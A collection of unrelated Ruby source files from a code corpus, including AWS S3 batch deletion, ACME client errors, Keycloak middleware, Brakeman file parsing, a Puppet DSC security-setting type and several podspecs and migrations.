# configured with MFA delete enabled.
# @option options [String] :request_payer
# Confirms that the requester knows that they will be charged for the
# request. Bucket owners need not specify this parameter in their
# requests. For information about downloading objects from requester
# pays buckets, see [Downloading Objects in Requestor Pays Buckets][1]
# in the *Amazon S3 Developer Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/ObjectsinRequesterPaysBuckets.html
# @option options [Boolean] :bypass_governance_retention
# Specifies whether you want to delete this object even if it has a
# Governance-type Object Lock in place. You must have sufficient
# permissions to perform this operation.
# @option options [String] :expected_bucket_owner
# The account id of the expected bucket owner. If the bucket is owned by
# a different account, the request will fail with an HTTP `403 (Access
# Denied)` error.
# @return [void]
def batch_delete!(options = {})
batch_enum.each do |batch|
params = Aws::Util.copy_hash(options)
params[:bucket] = batch[0].bucket_name
params[:delete] ||= {}
params[:delete][:objects] ||= []
batch.each do |item|
params[:delete][:objects] << {
key: item.key
}
end
batch[0].client.delete_objects(params)
end
nil
end
# @!endgroup
end
end
end
| 42.007449 | 169 | 0.658702 |
d5dfd0f253a6b29d0a115b12fe345ae0958eb38b | 728 | # frozen_string_literal: true
module Inferno
module USCore311ProfileDefinitions
class USCore311GoalSequenceDefinitions
MUST_SUPPORTS = {
extensions: [],
slices: [
{
name: 'Goal.target.due[x]:dueDate',
path: 'target.due',
discriminator: {
type: 'type',
code: 'Date'
}
}
],
elements: [
{
path: 'lifecycleStatus'
},
{
path: 'description'
},
{
path: 'subject'
},
{
path: 'target'
}
]
}.freeze
DELAYED_REFERENCES = [].freeze
end
end
end
| 19.157895 | 47 | 0.42033 |
bb47c26306b6039d779fc4f802016001575d129d | 2,644 | #
# The MIT License (MIT)
#
# Copyright (c) 2014 Wynand Pieterse
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Version 0.1.0
#
require $setUpSerialLogging
require $setUpProvisionLogging
# Defines our control VM, the primary VM for all tasks.
def defineControlVM(control, vmName)
control.vm.hostname = vmName
control.vm.box = "https://cloud-images.ubuntu.com/vagrant/utopic/%s/utopic-server-cloudimg-amd64-vagrant-disk1.box" % $controlRequestImagePath
control.vm.network :private_network, ip: "10.10.10.10"
# Forward our Docker registry port to the outside world.
control.vm.network "forwarded_port", guest: 5000, host: $controlDockerRegistryPort, auto_correct: true
# Enabled serial logging if the user asked for it.
setUpSerialLogging vmName
# Build the log directory where all internal control machines logs will go to.
logFile = setUpProvisionLogging vmName
# Provision the machines.
control.vm.provision :shell, :path => "automation/vagrant/tasks/ProvisionControlBase.sh", :privileged => false, :args => "%s" % logFile
control.vm.provision :shell, :path => "automation/vagrant/tasks/ProvisionControlFiles.sh", :privileged => false, :args => "%s %s" % [logFile, $coreInstances]
control.vm.provision :shell, :path => "automation/vagrant/tasks/ProvisionControlAnsible.sh", :privileged => false, :args => "%s" % logFile
control.vm.provision :shell, :path => "automation/vagrant/tasks/ProvisionControlDocker.sh", :privileged => false, :args => "%s" % logFile
control.vm.provision :shell, :path => "automation/vagrant/tasks/ProvisionControlRegistry.sh", :privileged => false, :args => "%s" % logFile
end
| 50.846154 | 158 | 0.760212 |
1133d5672235d5921904b998d5b0517f4d7c37ef | 1,664 | #
# Be sure to run `pod lib lint FZHExtension.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'FZHExtension'
s.version = '0.1.1'
s.swift_version = '3.0'
s.summary = 'Swift 总结的常用的extension - FZHExtension.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/fengzhihao123/FZHExtension.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '[email protected]' => '[email protected]' }
s.source = { :git => 'https://github.com/fengzhihao123/FZHExtension.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'FZHExtension/Classes/**/*'
# s.resource_bundles = {
# 'FZHExtension' => ['FZHExtension/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 37.818182 | 110 | 0.643029 |
7aa2120918f17b13c39bc132412cb0f9bd1c1552 | 266 | require 'bundler/setup'
require 'aasm-diagram'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 22.166667 | 63 | 0.744361 |
1c4baeca1c76a1addff5da925cb06dc443b94a8b | 171 | class DropContactDetails < ActiveRecord::Migration[5.2]
def up
drop_table :contact_details
end
def down
raise ActiveRecord::IrreversibleMigration
end
end
| 17.1 | 55 | 0.760234 |
ed161200ede0ac43743abcc00754b6a7ea283a4a | 2,622 | class Acme::Client::Error < StandardError
class Timeout < Acme::Client::Error; end
class ClientError < Acme::Client::Error; end
class InvalidDirectory < ClientError; end
class UnsupportedOperation < ClientError; end
class UnsupportedChallengeType < ClientError; end
class NotFound < ClientError; end
class CertificateNotReady < ClientError; end
class ForcedChainNotFound < ClientError; end
class ServerError < Acme::Client::Error; end
class BadCSR < ServerError; end
class BadNonce < ServerError; end
class BadSignatureAlgorithm < ServerError; end
class InvalidContact < ServerError; end
class UnsupportedContact < ServerError; end
class ExternalAccountRequired < ServerError; end
class AccountDoesNotExist < ServerError; end
class Malformed < ServerError; end
class RateLimited < ServerError; end
class RejectedIdentifier < ServerError; end
class ServerInternal < ServerError; end
class Unauthorized < ServerError; end
class UnsupportedIdentifier < ServerError; end
class UserActionRequired < ServerError; end
class BadRevocationReason < ServerError; end
class Caa < ServerError; end
class Dns < ServerError; end
class Connection < ServerError; end
class Tls < ServerError; end
class IncorrectResponse < ServerError; end
ACME_ERRORS = {
'urn:ietf:params:acme:error:badCSR' => BadCSR,
'urn:ietf:params:acme:error:badNonce' => BadNonce,
'urn:ietf:params:acme:error:badSignatureAlgorithm' => BadSignatureAlgorithm,
'urn:ietf:params:acme:error:invalidContact' => InvalidContact,
'urn:ietf:params:acme:error:unsupportedContact' => UnsupportedContact,
'urn:ietf:params:acme:error:externalAccountRequired' => ExternalAccountRequired,
'urn:ietf:params:acme:error:accountDoesNotExist' => AccountDoesNotExist,
'urn:ietf:params:acme:error:malformed' => Malformed,
'urn:ietf:params:acme:error:rateLimited' => RateLimited,
'urn:ietf:params:acme:error:rejectedIdentifier' => RejectedIdentifier,
'urn:ietf:params:acme:error:serverInternal' => ServerInternal,
'urn:ietf:params:acme:error:unauthorized' => Unauthorized,
'urn:ietf:params:acme:error:unsupportedIdentifier' => UnsupportedIdentifier,
'urn:ietf:params:acme:error:userActionRequired' => UserActionRequired,
'urn:ietf:params:acme:error:badRevocationReason' => BadRevocationReason,
'urn:ietf:params:acme:error:caa' => Caa,
'urn:ietf:params:acme:error:dns' => Dns,
'urn:ietf:params:acme:error:connection' => Connection,
'urn:ietf:params:acme:error:tls' => Tls,
'urn:ietf:params:acme:error:incorrectResponse' => IncorrectResponse
}
end
| 46 | 84 | 0.757437 |
28962a9c8eef9122f2fd27ed2834df1286547b7b | 659 | module Ranker::Strategies
##
# Ranks rankables according to: http://en.wikipedia.org/wiki/Ranking#Modified_competition_ranking_.28.221334.22_ranking.29
#
class ModifiedCompetition < Strategy
# Methods:
def execute
rank = 0
scores_unique_sorted.each_with_index { |score, index|
rankables_for_score = rankables_for_score(score)
if rank == 0
create_ranking(1, score, rankables_for_score)
rank += rankables_for_score.count
else
rank += rankables_for_score.count
create_ranking(rank, score, rankables_for_score)
end
}
end
end # class
end # module
| 24.407407 | 124 | 0.664643 |
f792f3b3bdb4e041345d9f89cdea1798ff4e731e | 2,004 | module Keycloak
class Middleware
def initialize(app)
@app = app
end
def call(env)
if Keycloak.config.server_url.present?
authenticate(env)
else
@app.call(env)
end
end
def authenticate(env)
method = env["REQUEST_METHOD"]
path = env["PATH_INFO"]
query_string = env["QUERY_STRING"]
if service.need_authentication?(method, path, query_string, env)
logger.debug("Start authentication for #{method} : #{path}")
token = service.read_token(query_string, env)
decoded_token = service.decode_and_verify(token)
authentication_succeeded(env, decoded_token)
else
logger.debug("Skip authentication for #{method} : #{path}")
@app.call(env)
end
rescue TokenError => e
# authentication_failed(e.message)
# WTS-881 added failed msg to be captured by controller
# to make sure the logger to log the request and got shipped to datadog
# continue the request
env[:identity_auth_error_message] = e.message
@app.call(env)
end
def authentication_failed(message)
logger.info(message)
[401, {"Content-Type" => "application/json"}, [ { error: message }.to_json]]
end
def authentication_succeeded(env, decoded_token)
Helper.assign_current_user_id(env, decoded_token)
Helper.assign_current_authorized_party(env, decoded_token)
Helper.assign_current_user_email(env, decoded_token)
Helper.assign_current_user_locale(env, decoded_token)
Helper.assign_current_user_custom_attributes(env, decoded_token, config.custom_attributes)
Helper.assign_realm_roles(env, decoded_token)
Helper.assign_resource_roles(env, decoded_token)
Helper.assign_keycloak_token(env, decoded_token)
@app.call(env)
end
def service
Keycloak.service
end
def logger
Keycloak.logger
end
def config
Keycloak.config
end
end
end
| 28.628571 | 96 | 0.671657 |
280ea0ef98a90e9557f0e1d4defdc961003cc16f | 298 | class YoutubeVideo < Video
self.table_name = "asset_host_core_youtube_videos"
def attrs
{
"data-assethost" => "YoutubeVideo",
"data-ah-videoid" => self.videoid
}
end
def as_json
{
:class => "YoutubeVideo",
:videoid => self.videoid
}
end
end
| 16.555556 | 52 | 0.59396 |
e261739e64ce158b885c4689aae440fc78849881 | 652 | asset_directory = File.expand_path('../../../../assets', __FILE__)
asset_file_paths = Dir.glob(File.join(asset_directory, 'message-bus.js'))
asset_file_names = asset_file_paths.map{|e| File.basename(e) }
describe asset_file_names do
it 'should contain .js files' do
expect(asset_file_names).to include('message-bus.js')
end
end
asset_file_paths.each do | path |
describe "Asset file #{File.basename(path).inspect}" do
it 'should be encodable as UTF8' do
binary_data = File.open(path, 'rb'){|f| f.read }
encode_block = -> { binary_data.encode(Encoding::UTF_8) }
expect(encode_block).not_to raise_error
end
end
end | 34.315789 | 73 | 0.708589 |
d5395cb80c0e07c50206db561aeab44a95c08e44 | 293 | Binda::Api::Types::SelectionType = GraphQL::ObjectType.define do
name 'Binda_Selection'
field :value, types.String do
resolve ->(obj, args, ctx) do
obj[:value]
end
end
field :label, types.String do
resolve ->(obj, args, ctx) do
obj[:label]
end
end
end
| 17.235294 | 64 | 0.631399 |
e83883217c3e377ac63d9502f5b7f7b6a790f02d | 1,347 | module Brakeman
ASTFile = Struct.new(:path, :ast)
# This class handles reading and parsing files.
class FileParser
attr_reader :file_list
def initialize tracker
@tracker = tracker
@timeout = @tracker.options[:parser_timeout]
@app_tree = @tracker.app_tree
@file_list = {}
end
def parse_files list, type
read_files list, type do |path, contents|
if ast = parse_ruby(contents, path.relative)
ASTFile.new(path, ast)
end
end
end
def read_files list, type
@file_list[type] ||= []
list.each do |path|
file = @app_tree.file_path(path)
result = yield file, file.read
if result
@file_list[type] << result
end
end
end
def parse_ruby input, path
begin
Brakeman.debug "Parsing #{path}"
RubyParser.new.parse input, path, @timeout
rescue Racc::ParseError => e
@tracker.error e, "Could not parse #{path}"
nil
rescue Timeout::Error => e
@tracker.error Exception.new("Parsing #{path} took too long (> #{@timeout} seconds). Try increasing the limit with --parser-timeout"), caller
nil
rescue => e
@tracker.error e.exception(e.message + "\nWhile processing #{path}"), e.backtrace
nil
end
end
end
end
| 25.415094 | 149 | 0.599852 |
9169b811e0282bbbbe058a52d09a40aa30b3f6af | 1,019 | namespace :import do
require 'net/http'
desc "Runs a full import of companies, engines, genres, platforms, series, games, and optionally covers."
task :full, [:include_covers] => :environment do |_task, args|
args.with_defaults(include_covers: false)
puts 'Running a full import...'
import_tasks = [
"import:wikidata:companies",
"import:wikidata:engines",
"import:wikidata:genres",
"import:wikidata:platforms",
"import:wikidata:series",
"import:wikidata:games"
]
# Only import covers if the :include_covers argument is true.
import_tasks << "import:pcgamingwiki:covers" if args[:include_covers]
import_tasks.each do |task|
puts "Running 'rake #{task}'."
Rake::Task[task].invoke
puts
puts '-------------------------'
puts
end
puts "Import completed!"
puts "Run 'bundle exec rake rebuild:multisearch:all' to rebuild all the multisearch indices, or nothing will show up in your search results!"
end
end
| 30.878788 | 145 | 0.657507 |
1106d99013b2fe3d0b2c9d8c065458c452e7f516 | 174 | class ChangeApplicationsDocumentToApplicationDocuments < ActiveRecord::Migration[5.1]
def change
rename_table :applications_documents, :application_documents
end
end
| 29 | 85 | 0.83908 |
87f3d73765ea70e9d771b300396ebcb459e09b1f | 231 | class CreateSubmissions < ActiveRecord::Migration
def change
create_table :submissions do |t|
t.integer :student_number
t.string :site_url
t.integer :points
t.timestamps null: false
end
end
end
| 19.25 | 49 | 0.683983 |
4a5c6352ba4bf99b5623d45b2f1dafb1fd0dbcda | 372 | =begin
An example of generating swagger via gRPC ecosystem.
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://github.com/openapitools/openapi-generator.git
=end
class V1ExampleServiceQueryRequest < ApplicationRecord
end
| 23.25 | 106 | 0.817204 |
1a537e7e4e87e67b6579ab590da9c2c01f3afbbd | 1,767 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20161117163442) do
create_table "users", force: :cascade do |t|
t.string "username", default: "", null: false
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at"
t.datetime "remember_created_at"
t.integer "sign_in_count", default: 0, null: false
t.datetime "current_sign_in_at"
t.datetime "last_sign_in_at"
t.string "current_sign_in_ip"
t.string "last_sign_in_ip"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
add_index "users", ["email"], name: "index_users_on_email", unique: true
add_index "users", ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true
add_index "users", ["username"], name: "index_users_on_username", unique: true
end
| 47.756757 | 104 | 0.703452 |
28992797bb2017d69361784368b67f809ce7a458 | 15,931 | require 'pathname'
Puppet::Type.newtype(:dsc_securitysetting) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC SecuritySetting resource type.
Automatically generated from
'SecurityPolicyDsc/DSCResources/MSFT_SecuritySetting/MSFT_SecuritySetting.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_name is a required attribute') if self[:dsc_name].nil?
end
def dscmeta_resource_friendly_name; 'SecuritySetting' end
def dscmeta_resource_name; 'MSFT_SecuritySetting' end
def dscmeta_module_name; 'SecurityPolicyDsc' end
def dscmeta_module_version; '1.5.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
newvalue(:absent) { provider.destroy }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: Name
# Type: string
# IsMandatory: True
# Values: ["MinimumPasswordAge", "MaximumPasswordAge", "MinimumPasswordLength", "PasswordComplexity", "PasswordHistorySize", "LockoutBadCount", "ForceLogoffWhenHourExpire", "NewAdministratorName", "NewGuestName", "ClearTextPassword", "LSAAnonymousNameLookup", "EnableAdminAccount", "EnableGuestAccount", "ResetLockoutCount", "LockoutDuration", "MaxServiceAge", "MaxTicketAge", "MaxRenewAge", "MaxClockSkew", "TicketValidateClient"]
newparam(:dsc_name) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "Name - This is just here to avoid conflicts Valid values are MinimumPasswordAge, MaximumPasswordAge, MinimumPasswordLength, PasswordComplexity, PasswordHistorySize, LockoutBadCount, ForceLogoffWhenHourExpire, NewAdministratorName, NewGuestName, ClearTextPassword, LSAAnonymousNameLookup, EnableAdminAccount, EnableGuestAccount, ResetLockoutCount, LockoutDuration, MaxServiceAge, MaxTicketAge, MaxRenewAge, MaxClockSkew, TicketValidateClient."
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['MinimumPasswordAge', 'minimumpasswordage', 'MaximumPasswordAge', 'maximumpasswordage', 'MinimumPasswordLength', 'minimumpasswordlength', 'PasswordComplexity', 'passwordcomplexity', 'PasswordHistorySize', 'passwordhistorysize', 'LockoutBadCount', 'lockoutbadcount', 'ForceLogoffWhenHourExpire', 'forcelogoffwhenhourexpire', 'NewAdministratorName', 'newadministratorname', 'NewGuestName', 'newguestname', 'ClearTextPassword', 'cleartextpassword', 'LSAAnonymousNameLookup', 'lsaanonymousnamelookup', 'EnableAdminAccount', 'enableadminaccount', 'EnableGuestAccount', 'enableguestaccount', 'ResetLockoutCount', 'resetlockoutcount', 'LockoutDuration', 'lockoutduration', 'MaxServiceAge', 'maxserviceage', 'MaxTicketAge', 'maxticketage', 'MaxRenewAge', 'maxrenewage', 'MaxClockSkew', 'maxclockskew', 'TicketValidateClient', 'ticketvalidateclient'].include?(value)
fail("Invalid value '#{value}'. Valid values are MinimumPasswordAge, MaximumPasswordAge, MinimumPasswordLength, PasswordComplexity, PasswordHistorySize, LockoutBadCount, ForceLogoffWhenHourExpire, NewAdministratorName, NewGuestName, ClearTextPassword, LSAAnonymousNameLookup, EnableAdminAccount, EnableGuestAccount, ResetLockoutCount, LockoutDuration, MaxServiceAge, MaxTicketAge, MaxRenewAge, MaxClockSkew, TicketValidateClient")
end
end
end
# Name: Ensure
# Type: string
# IsMandatory: False
# Values: ["Present", "Absent"]
newparam(:dsc_ensure) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "Ensure - Desired state of resource. Valid values are Present, Absent."
validate do |value|
resource[:ensure] = value.downcase
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['Present', 'present', 'Absent', 'absent'].include?(value)
fail("Invalid value '#{value}'. Valid values are Present, Absent")
end
end
end
# Name: MinimumPasswordAge
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_minimumpasswordage) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "MinimumPasswordAge"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaximumPasswordAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maximumpasswordage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaximumPasswordAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MinimumPasswordLength
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_minimumpasswordlength) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MinimumPasswordLength"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: PasswordComplexity
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_passwordcomplexity) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "PasswordComplexity"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: PasswordHistorySize
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_passwordhistorysize) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "PasswordHistorySize"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LockoutBadCount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_lockoutbadcount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "LockoutBadCount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: ForceLogoffWhenHourExpire
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_forcelogoffwhenhourexpire) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "ForceLogoffWhenHourExpire"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: NewAdministratorName
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_newadministratorname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "NewAdministratorName"
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: NewGuestName
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_newguestname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "NewGuestName"
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: ClearTextPassword
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_cleartextpassword) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "ClearTextPassword"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LSAAnonymousNameLookup
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_lsaanonymousnamelookup) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "LSAAnonymousNameLookup"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: EnableAdminAccount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_enableadminaccount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "EnableAdminAccount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: EnableGuestAccount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_enableguestaccount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "EnableGuestAccount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: ResetLockoutCount
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_resetlockoutcount) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "ResetLockoutCount"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LockoutDuration
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_lockoutduration) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "LockoutDuration"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxServiceAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxserviceage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxServiceAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxTicketAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxticketage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxTicketAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxRenewAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxrenewage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxRenewAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxClockSkew
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxclockskew) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxClockSkew"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: TicketValidateClient
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_ticketvalidateclient) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "TicketValidateClient"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_securitysetting).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 34.408207 | 871 | 0.661038 |
38369046bcd0d244478a055c7efba6a867b1dd9c | 442 | class ApplicationController < ActionController::Base
helper_method :current_user
helper_method :logged_in?
before_action :authenticated_user
require 'little-recipe-parser'
def current_user
@current_user ||= User.find_by(id: session[:user_id]) if session[:user_id]
end
def logged_in?
!!current_user
end
def authenticated_user
redirect_to root_path unless logged_in?
end
end
| 21.047619 | 82 | 0.70362 |
33c57795471aa2b5dc0177a4b8beb26b2faa3367 | 715 | Pod::Spec.new do |s|
s.name = 'AWSTranscribe'
s.version = '2.9.4'
s.summary = 'Amazon Web Services SDK for iOS.'
s.description = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'
